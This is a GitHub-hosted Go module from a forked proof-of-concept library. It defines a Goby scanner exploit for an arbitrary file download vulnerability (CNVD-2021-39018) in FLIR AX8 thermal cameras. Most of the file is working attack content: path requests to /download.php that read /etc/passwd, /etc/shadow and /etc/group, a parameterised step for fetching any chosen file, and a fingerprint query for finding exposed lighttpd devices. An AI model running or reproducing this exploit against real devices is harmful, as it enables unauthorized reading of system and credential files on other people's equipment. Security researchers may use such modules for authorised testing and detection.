forked from luck-ying/Library-POC
-
Notifications
You must be signed in to change notification settings - Fork 0
/
FLIR_AX8_Arbitrary_File_Download_Vulnerability_CNVD-2021-39018.go
146 lines (143 loc) · 4.46 KB
/
FLIR_AX8_Arbitrary_File_Download_Vulnerability_CNVD-2021-39018.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
func init() {
expJson := `{
"Name": "FLIR-AX8 Arbitrary File Download Vulnerability",
"Description": "Teledyne FLIR specializes in the design, development, manufacture, marketing and marketing of specialized technologies for enhanced situational awareness.\\nFLIR-AX8 has an arbitrary file download vulnerability.An attacker can use the vulnerability to download relevant system configuration files.",
"Product": "FLIR AX8 71213294,FLIR AX8 71219303",
"Homepage": "https://www.flir.cn",
"DisclosureDate": "2021-07-06",
"Author": "[email protected]",
"GobyQuery": "header=\"lighttpd\"",
"Level": "2",
"Impact": "<p><span style=\"font-size: 14px;\">Arbitrary file download or read vulnerability is mainly because when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter and does not verify the legitimacy of the file path, resulting in the attacker can jump through the directory (..</span><span style=\"font-size: 14px;\">\\ or..</span><span style=\"font-size: 14px;\">/) way to download or read a file outside the original specified path.</span><span style=\"font-size: 14px;\">The attacker can finally download or read any file on the system through the vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in the sensitive information leakage of the system</span><br></p>",
"Recommandation": "<p style=\"text-align: justify;\">The manufacturer has not provided the vulnerability fix solution, please pay attention to the manufacturer's home page to update:<span style=\"color: var(--primaryFont-color);\"><a href=\"https://www.flir.cn/\">https://www.flir.cn/</a></span></p>",
"References": [
"https://www.pwnwiki.org/index.php?title=%E8%8F%B2%E5%8A%9B%E7%88%BE_FLIR-AX8_download.php_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BC%89%E6%BC%8F%E6%B4%9E"
],
"HasExp": true,
"ExpParams": [
{
"name": "file",
"type": "createSelect",
"value": "/etc/passwd,/etc/shadow,/etc/hosts",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"OR",
{
"Request": {
"method": "GET",
"uri": "/download.php?file=/etc/group",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "GET",
"uri": "/download.php?file=/etc/passwd",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "GET",
"uri": "/download.php?file=/etc/shadow",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/download.php?file={{{file}}}",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"Tags": [
"fileread"
],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": ["FLIR AX8 71213294,FLIR AX8 71219303"],
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}